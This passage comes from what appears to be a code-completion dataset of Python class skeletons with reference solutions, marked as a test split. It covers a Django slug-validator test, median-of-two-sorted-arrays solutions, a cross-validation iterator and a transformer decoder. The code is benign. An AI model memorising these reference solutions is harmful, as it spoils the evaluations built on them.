test_validate_invalid_slug(self): Тестирование invalid slug\n- def test_validate_valid_slug(self): Тестирование valid slug\n\n<|skeleton|>\nclass 
SlugValidatorTest:\n \"\"\"Тестирование валидатора slug\"\"\"\n\n def test_validate_invalid_slug(self):\n \"\"\"Тестирование invalid slug\"\"\"\n <|body_0|>\n\n def test_validate_valid_slug(self):\n \"\"\"Тестирование valid slug\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()\n<|end_body_0|>\n\n<|body_start_1|>\n miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\n miner.full_clean()\n miner.save()\n<|end_body_1|>\n", "revision_id": "d173f1bee44d0752eefb53b1a0da847a3882a352", "skeleton": "<|skeleton|>\nclass SlugValidatorTest:\n \"\"\"Тестирование валидатора slug\"\"\"\n\n def test_validate_invalid_slug(self):\n \"\"\"Тестирование invalid slug\"\"\"\n <|body_0|>\n\n def test_validate_valid_slug(self):\n \"\"\"Тестирование valid slug\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SlugValidatorTest:\n \"\"\"Тестирование валидатора slug\"\"\"\n\n def test_validate_invalid_slug(self):\n \"\"\"Тестирование invalid slug\"\"\"\n with self.assertRaises(ValidationError):\n miner = Miner(name='Some Miner', version='1.0.0', slug='create')\n miner.full_clean()\n miner.save()\n\n def test_validate_valid_slug(self):\n \"\"\"Тестирование valid slug\"\"\"\n miner = Miner(name='Some Miner', version='1.0.0', slug='some-miner-slug')\n miner.full_clean()\n miner.save()\n", "source": "the_stack_v2_python_sparse", "source_path": "miningstatistic/core/tests.py", "source_repo": "crowmurk/miners", "split": "test", "star_events_count": 0} {"blob_id": "3129433c1ee56338d3e7aecd45e77590651e34b2", "bodies": ["m, n = (len(nums1), len(nums2))\nif m == 0:\n if n & 1 == 0:\n return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n return nums2[n // 2]\nif n == 0:\n if m & 1 == 0:\n return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n return nums1[m // 2]\ntotal = m + n\nif total & 1 == 1:\n return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\nreturn (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2", "if a_begin >= len(a):\n return b[b_begin + k - 1]\nif b_begin >= len(b):\n return a[a_begin + k - 1]\nif k == 1:\n return min(a[a_begin], b[b_begin])\nmid_a = mid_b = max(a[-1], b[-1]) + 1\nif a_begin + k // 2 - 1 < len(a):\n mid_a = a[a_begin + k // 2 - 1]\nif b_begin + k // 2 - 1 < len(b):\n mid_b = b[b_begin + k // 2 - 1]\nif mid_a <= mid_b:\n return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\nreturn self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)", "new_list = list()\ni = j = 0\nwhile i < len(nums1) and j < len(nums2):\n if nums1[i] <= nums2[j]:\n new_list.append(nums1[i])\n i += 1\n else:\n new_list.append(nums2[j])\n j += 1\nwhile i < len(nums1):\n new_list.append(nums1[i])\n i += 1\nwhile j < len(nums2):\n new_list.append(nums2[j])\n j += 1\nif len(new_list) % 2 == 0:\n middle = len(new_list) // 2\n return (new_list[middle - 1] + new_list[middle]) / 2\nelse:\n return new_list[len(new_list) // 2]"], "bodies_text": "<|body_start_0|>\n m, n = (len(nums1), len(nums2))\n if m == 0:\n if n & 1 == 0:\n return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n return nums2[n // 2]\n if n == 0:\n if m & 1 == 0:\n return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n return nums1[m // 2]\n total = m + n\n if total & 1 == 1:\n return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\n 
return (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2\n<|end_body_0|>\n\n<|body_start_1|>\n    if a_begin >= len(a):\n        return b[b_begin + k - 1]\n    if b_begin >= len(b):\n        return a[a_begin + k - 1]\n    if k == 1:\n        return min(a[a_begin], b[b_begin])\n    mid_a = mid_b = max(a[-1], b[-1]) + 1\n    if a_begin + k // 2 - 1 < len(a):\n        mid_a = a[a_begin + k // 2 - 1]\n    if b_begin + k // 2 - 1 < len(b):\n        mid_b = b[b_begin + k // 2 - 1]\n    if mid_a <= mid_b:\n        return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\n    return self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)\n<|end_body_1|>\n\n<|body_start_2|>\n    new_list = list()\n    i = j = 0\n    while i < len(nums1) and j < len(nums2):\n        if nums1[i] <= nums2[j]:\n            new_list.append(nums1[i])\n            i += 1\n        else:\n            new_list.append(nums2[j])\n            j += 1\n    while i < len(nums1):\n        new_list.append(nums1[i])\n        i += 1\n    while j < len(nums2):\n        new_list.append(nums2[j])\n        j += 1\n    if len(new_list) % 2 == 0:\n        middle = len(new_list) // 2\n        return (new_list[middle - 1] + new_list[middle]) / 2\n    else:\n        return new_list[len(new_list) // 2]\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n    def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n        \"\"\"Find the median of two sorted arrays. Generalize the problem to finding the k-th element of two sorted arrays; when k = (m+n)/2 this gives the answer to the original problem. How to find the k-th element? Take the (k/2)-th element a of the first array and the (k/2)-th element b of the second array, then compare a and b. When a < b, the k-th element lies in the part of array a after its (k/2)-th element or in the part of array b before its (k/2)-th element, so the problem size is halved; then just recurse. The time complexity is O(log(m+n)) :param nums1: :param nums2: :return:\"\"\"\n        <|body_0|>\n\n    def find_k(self, a, a_begin, b, b_begin, k):\n        \"\"\"Find the k-th number across arrays a and b\"\"\"\n        <|body_1|>\n\n    def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float:\n        \"\"\"The median has equally many numbers on its left and right; if the total count is even, take the sum of the two middle numbers divided by 2. This approach does not satisfy the O(log(m+n)) bound, where m and n are the lengths of the two arrays :param nums1: :param nums2: :return:\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    m, n = (len(nums1), len(nums2))\n    if m == 0:\n        if n & 1 == 0:\n            return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n        return nums2[n // 2]\n    if n == 0:\n        if m & 1 == 0:\n            return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n        return nums1[m // 2]\n    total = m + n\n    if total & 1 == 1:\n        return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\n    return (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2\n<|end_body_0|>\n\n<|body_start_1|>\n    if a_begin >= len(a):\n        return b[b_begin + k - 1]\n    if b_begin >= len(b):\n        return a[a_begin + k - 1]\n    if k == 1:\n        return min(a[a_begin], b[b_begin])\n    mid_a = mid_b = max(a[-1], b[-1]) + 1\n    if a_begin + k // 2 - 1 < len(a):\n        mid_a = a[a_begin + k // 2 - 1]\n    if b_begin + k // 2 - 1 < len(b):\n        mid_b = b[b_begin + k // 2 - 1]\n    if mid_a <= mid_b:\n        return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\n    return self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)\n<|end_body_1|>\n\n<|body_start_2|>\n    new_list = list()\n    i = j = 0\n    while i < len(nums1) and j < len(nums2):\n        if nums1[i] <= nums2[j]:\n            new_list.append(nums1[i])\n            i += 1\n        else:\n            new_list.append(nums2[j])\n            j += 1\n    while i < len(nums1):\n        new_list.append(nums1[i])\n        i += 1\n    while j < len(nums2):\n        new_list.append(nums2[j])\n        j += 1\n    if len(new_list) % 2 == 0:\n        middle = len(new_list) // 2\n        return (new_list[middle - 1] + new_list[middle]) / 2\n    else:\n        return new_list[len(new_list) // 2]\n<|end_body_2|>\n", "id": 
"stack_v2_sparse_classes_10k_test_000443", "length_bytes": 3908, "license_type": "no_license", "methods": [{"docstring": "Find the median of two sorted arrays. Generalize the problem to finding the k-th element of two sorted arrays; when k = (m+n)/2 this gives the answer to the original problem. How to find the k-th element? Take the (k/2)-th element a of the first array and the (k/2)-th element b of the second array, then compare a and b. When a < b, the k-th element lies in the part of array a after its (k/2)-th element or in the part of array b before its (k/2)-th element, so the problem size is halved; then just recurse. The time complexity is O(log(m+n)) :param nums1: :param nums2: :return:", "name": "findMedianSortedArrays", "signature": "def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float"}, {"docstring": "Find the k-th number across arrays a and b", "name": "find_k", "signature": "def find_k(self, a, a_begin, b, b_begin, k)"}, {"docstring": "The median has equally many numbers on its left and right; if the total count is even, take the sum of the two middle numbers divided by 2. This approach does not satisfy the O(log(m+n)) bound, where m and n are the lengths of the two arrays :param nums1: :param nums2: :return:", "name": "findMedianSortedArrays1", "signature": "def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_006041", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float: Find the median of two sorted arrays. Generalize the problem to finding the k-th element of two sorted arrays; when k = (m+n)/2 this gives the answer to the original problem. How to find the k-th element? Take the (k/2)-th element a of the first array and the (k/2)-th element b of the second array, then compare a and b. When a < b, the k-th element lies in the part of array a after its (k/2)-th element or in the part of array b before its (k/2)-th element, so the problem size is halved; then just recurse. The time complexity is O(log(m+n)) :param nums1: :param nums2: :return:\n- def find_k(self, a, a_begin, b, b_begin, k): Find the k-th number across arrays a and b\n- def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float: The median has equally many numbers on its left and right; if the total count is even, take the sum of the two middle numbers divided by 2. This approach does not satisfy the O(log(m+n)) bound, where m and n are the lengths of the two arrays :param nums1: :param nums2: :return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float: Find the median of two sorted arrays. Generalize the problem to finding the k-th element of two sorted arrays; when k = (m+n)/2 this gives the answer to the original problem. How to find the k-th element? Take the (k/2)-th element a of the first array and the (k/2)-th element b of the second array, then compare a and b. When a < b, the k-th element lies in the part of array a after its (k/2)-th element or in the part of array b before its (k/2)-th element, so the problem size is halved; then just recurse. The time complexity is O(log(m+n)) :param nums1: :param nums2: :return:\n- def find_k(self, a, a_begin, b, b_begin, k): Find the k-th number across arrays a and b\n- def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float: The median has equally many numbers on its left and right; if the total count is even, take the sum of the two middle numbers divided by 2. This approach does not satisfy the O(log(m+n)) bound, where m and n are the lengths of the two arrays :param nums1: :param nums2: :return:\n\n<|skeleton|>\nclass Solution:\n\n    def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n        \"\"\"Find the median of two sorted arrays. Generalize the problem to finding the k-th element of two sorted arrays; when k = (m+n)/2 this gives the answer to the original problem. How to find the k-th element? Take the (k/2)-th element a of the first array and the (k/2)-th element b of the second array, then compare a and b. When a < b, the k-th element lies in the part of array a after its (k/2)-th element or in the part of array b before its (k/2)-th element, so the problem size is halved; then just recurse. The time complexity is O(log(m+n)) :param nums1: :param nums2: :return:\"\"\"\n        <|body_0|>\n\n    def find_k(self, a, a_begin, b, b_begin, k):\n        \"\"\"Find the k-th number across arrays a and b\"\"\"\n        <|body_1|>\n\n    def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float:\n        \"\"\"The median has equally many numbers on its left and right; if the total count is even, take the sum of the two middle numbers divided by 2. This approach does not satisfy the O(log(m+n)) bound, where m and n are the lengths of the two arrays :param nums1: :param nums2: :return:\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n    m, n = (len(nums1), len(nums2))\n    if m == 0:\n        if n & 1 == 0:\n            return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n        return nums2[n // 2]\n    if n == 0:\n        if m & 1 == 0:\n            return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n        return nums1[m // 2]\n    total = m + n\n    if total & 1 == 1:\n        return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\n    return (self.find_k(nums1, 0, nums2, 0, 
total // 2 + 1)) / 2\n<|end_body_0|>\n\n<|body_start_1|>\n    if a_begin >= len(a):\n        return b[b_begin + k - 1]\n    if b_begin >= len(b):\n        return a[a_begin + k - 1]\n    if k == 1:\n        return min(a[a_begin], b[b_begin])\n    mid_a = mid_b = max(a[-1], b[-1]) + 1\n    if a_begin + k // 2 - 1 < len(a):\n        mid_a = a[a_begin + k // 2 - 1]\n    if b_begin + k // 2 - 1 < len(b):\n        mid_b = b[b_begin + k // 2 - 1]\n    if mid_a <= mid_b:\n        return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\n    return self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)\n<|end_body_1|>\n\n<|body_start_2|>\n    new_list = list()\n    i = j = 0\n    while i < len(nums1) and j < len(nums2):\n        if nums1[i] <= nums2[j]:\n            new_list.append(nums1[i])\n            i += 1\n        else:\n            new_list.append(nums2[j])\n            j += 1\n    while i < len(nums1):\n        new_list.append(nums1[i])\n        i += 1\n    while j < len(nums2):\n        new_list.append(nums2[j])\n        j += 1\n    if len(new_list) % 2 == 0:\n        middle = len(new_list) // 2\n        return (new_list[middle - 1] + new_list[middle]) / 2\n    else:\n        return new_list[len(new_list) // 2]\n<|end_body_2|>\n", "revision_id": "971cc2f674d53cf33a621a3a608f32a53603438a", "skeleton": "<|skeleton|>\nclass Solution:\n\n    def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n        \"\"\"Find the median of two sorted arrays. Generalize the problem to finding the k-th element of two sorted arrays; when k = (m+n)/2 this gives the answer to the original problem. How to find the k-th element? Take the (k/2)-th element a of the first array and the (k/2)-th element b of the second array, then compare a and b. When a < b, the k-th element lies in the part of array a after its (k/2)-th element or in the part of array b before its (k/2)-th element, so the problem size is halved; then just recurse. The time complexity is O(log(m+n)) :param nums1: :param nums2: :return:\"\"\"\n        <|body_0|>\n\n    def find_k(self, a, a_begin, b, b_begin, k):\n        \"\"\"Find the k-th number across arrays a and b\"\"\"\n        <|body_1|>\n\n    def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float:\n        \"\"\"The median has equally many numbers on its left and right; if the total count is even, take the sum of the two middle numbers divided by 2. This approach does not satisfy the O(log(m+n)) bound, where m and n are the lengths of the two arrays :param nums1: :param nums2: :return:\"\"\"\n        <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n    def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n        \"\"\"Find the median of two sorted arrays. Generalize the problem to finding the k-th element of two sorted arrays; when k = (m+n)/2 this gives the answer to the original problem. How to find the k-th element? Take the (k/2)-th element a of the first array and the (k/2)-th element b of the second array, then compare a and b. When a < b, the k-th element lies in the part of array a after its (k/2)-th element or in the part of array b before its (k/2)-th element, so the problem size is halved; then just recurse. The time complexity is O(log(m+n)) :param nums1: :param nums2: :return:\"\"\"\n        m, n = (len(nums1), len(nums2))\n        if m == 0:\n            if n & 1 == 0:\n                return (nums2[n // 2] + nums2[n // 2 - 1]) / 2\n            return nums2[n // 2]\n        if n == 0:\n            if m & 1 == 0:\n                return (nums1[m // 2] + nums1[m // 2 - 1]) / 2\n            return nums1[m // 2]\n        total = m + n\n        if total & 1 == 1:\n            return self.find_k(nums1, 0, nums2, 0, total // 2 + 1)\n        return (self.find_k(nums1, 0, nums2, 0, total // 2) + self.find_k(nums1, 0, nums2, 0, total // 2 + 1)) / 2\n\n    def find_k(self, a, a_begin, b, b_begin, k):\n        \"\"\"Find the k-th number across arrays a and b\"\"\"\n        if a_begin >= len(a):\n            return b[b_begin + k - 1]\n        if b_begin >= len(b):\n            return a[a_begin + k - 1]\n        if k == 1:\n            return min(a[a_begin], b[b_begin])\n        mid_a = mid_b = max(a[-1], b[-1]) + 1\n        if a_begin + k // 2 - 1 < len(a):\n            mid_a = a[a_begin + k // 2 - 1]\n        if b_begin + k // 2 - 1 < len(b):\n            mid_b = b[b_begin + k // 2 - 1]\n        if mid_a <= mid_b:\n            return self.find_k(a, a_begin + k // 2, b, b_begin, k - k // 2)\n        return self.find_k(a, a_begin, b, b_begin + k // 2, k - k // 2)\n\n    def findMedianSortedArrays1(self, nums1: List[int], nums2: List[int]) -> float:\n        \"\"\"The median has equally many numbers on its left and right; if the total count is even, take the sum of the two middle numbers divided by 2. This approach does not satisfy the O(log(m+n)) bound, where m and n are the lengths of the two arrays :param nums1: :param nums2: :return:\"\"\"\n        new_list = list()\n        i = j 
= 0\n while i < len(nums1) and j < len(nums2):\n if nums1[i] <= nums2[j]:\n new_list.append(nums1[i])\n i += 1\n else:\n new_list.append(nums2[j])\n j += 1\n while i < len(nums1):\n new_list.append(nums1[i])\n i += 1\n while j < len(nums2):\n new_list.append(nums2[j])\n j += 1\n if len(new_list) % 2 == 0:\n middle = len(new_list) // 2\n return (new_list[middle - 1] + new_list[middle]) / 2\n else:\n return new_list[len(new_list) // 2]\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/困难/4寻找两个有序数组的中位数.py", "source_repo": "xiyangxitian1/learn_days", "split": "test", "star_events_count": 0} {"blob_id": "eb90e6cd01b97c3c8dc0d6d859b269d6be558285", "bodies": ["super(FilteredLeaveOneGroupOut, self).__init__()\nself.keep = keep\nself.example_ids = example_ids\nself._warned = False\nself.logger = logger if logger else logging.getLogger(__name__)", "for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)"], "bodies_text": "<|body_start_0|>\n super(FilteredLeaveOneGroupOut, self).__init__()\n self.keep = keep\n self.example_ids = example_ids\n self._warned = False\n self.logger = logger if logger else logging.getLogger(__name__)\n<|end_body_0|>\n\n<|body_start_1|>\n for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)\n<|end_body_1|>\n", "class_docstring": "Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.", "class_name": "FilteredLeaveOneGroupOut", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass FilteredLeaveOneGroupOut:\n \"\"\"Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\"\"\"\n\n def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None):\n \"\"\"Initialize the model.\"\"\"\n <|body_0|>\n\n def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator:\n \"\"\"Generate indices to split data into training and test set. 
Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(FilteredLeaveOneGroupOut, self).__init__()\n self.keep = keep\n self.example_ids = example_ids\n self._warned = False\n self.logger = logger if logger else logging.getLogger(__name__)\n<|end_body_0|>\n\n<|body_start_1|>\n for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000444", "length_bytes": 47118, "license_type": "permissive", "methods": [{"docstring": "Initialize the model.", "name": "__init__", "signature": "def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None)"}, {"docstring": "Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.", "name": "split", "signature": "def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000932", "prompt": "Implement the Python class `FilteredLeaveOneGroupOut` described below.\n\nClass description:\nCustom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\n\nMethod signatures and docstrings:\n- def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None): Initialize the model.\n- def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator: Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. 
groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.", "prompted_full_text": "Implement the Python class `FilteredLeaveOneGroupOut` described below.\n\nClass description:\nCustom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\n\nMethod signatures and docstrings:\n- def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None): Initialize the model.\n- def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator: Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\n\n<|skeleton|>\nclass FilteredLeaveOneGroupOut:\n \"\"\"Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\"\"\"\n\n def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None):\n \"\"\"Initialize the model.\"\"\"\n <|body_0|>\n\n def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator:\n \"\"\"Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. 
test_index : numpy.ndarray The testing set indices for that split.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(FilteredLeaveOneGroupOut, self).__init__()\n self.keep = keep\n self.example_ids = example_ids\n self._warned = False\n self.logger = logger if logger else logging.getLogger(__name__)\n<|end_body_0|>\n\n<|body_start_1|>\n for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)\n<|end_body_1|>\n", "revision_id": "b10ce3963620d8679a1ce82ccb2268f7ea5fb9c9", "skeleton": "<|skeleton|>\nclass FilteredLeaveOneGroupOut:\n \"\"\"Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\"\"\"\n\n def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None):\n \"\"\"Initialize the model.\"\"\"\n <|body_0|>\n\n def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator:\n \"\"\"Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class FilteredLeaveOneGroupOut:\n \"\"\"Custom version ``LeaveOneGroupOut`` cross-validation iterator. This version only outputs indices of instances with IDs in a prespecified set. Parameters ---------- keep : Iterable[IdType] A set of IDs to keep. example_ids : numpy.ndarray, of length n_samples A list of example IDs. logger : Optional[logging.Logger], default=None A logger instance.\"\"\"\n\n def __init__(self, keep: Iterable[IdType], example_ids: np.ndarray, logger: Optional[logging.Logger]=None):\n \"\"\"Initialize the model.\"\"\"\n super(FilteredLeaveOneGroupOut, self).__init__()\n self.keep = keep\n self.example_ids = example_ids\n self._warned = False\n self.logger = logger if logger else logging.getLogger(__name__)\n\n def split(self, X: SparseFeatureMatrix, y: np.ndarray, groups: Optional[List[str]]) -> IndexIterator:\n \"\"\"Generate indices to split data into training and test set. Parameters ---------- X : numpy.ndarray, with shape (n_samples, n_features) Training data, where n_samples is the number of samples and n_features is the number of features. 
y : numpy.ndarray, of length n_samples The target variable for supervised learning problems. groups : List[str] Group labels for the samples used while splitting the dataset into train/test set. Yields ------ train_index : numpy.ndarray The training set indices for that split. test_index : numpy.ndarray The testing set indices for that split.\"\"\"\n for train_index, test_index in super(FilteredLeaveOneGroupOut, self).split(X, y, groups):\n train_len = len(train_index)\n test_len = len(test_index)\n train_index = [i for i in train_index if self.example_ids[i] in self.keep]\n test_index = [i for i in test_index if self.example_ids[i] in self.keep]\n if not self._warned and (train_len != len(train_index) or test_len != len(test_index)):\n self.logger.warning('Feature set contains IDs that are not in folds dictionary. Skipping those IDs.')\n self._warned = True\n yield (train_index, test_index)\n", "source": "the_stack_v2_python_sparse", "source_path": "skll/learner/utils.py", "source_repo": "EducationalTestingService/skll", "split": "test", "star_events_count": 320} {"blob_id": "446f93db141f6f425732417fb84e211bbd69465d", "bodies": ["super().__init__()\nself.N = N\nself.dm = dm\nself.embedding = tf.keras.layers.Embedding(target_vocab, dm)\nself.positional_encoding = positional_encoding(max_seq_len, dm)\nself.blocks = [DecoderBlock(dm, h, hidden, drop_rate) for _ in range(N)]\nself.dropout = tf.keras.layers.Dropout(drop_rate)", "seq_len = tf.shape(x)[1]\nattention_weights = {}\nx = self.embedding(x)\nx *= tf.math.sqrt(tf.cast(self.dm, tf.float32))\nx += self.positional_encoding[:, :seq_len, :]\nx = self.dropout(x, training=training)\nfor i in range(self.N):\n x, block1, block2 = self.blocks[i](x, encoder_output, training, look_ahead_mask, padding_mask)\nattention_weights['decoder_layer{}_block1'.format(i + 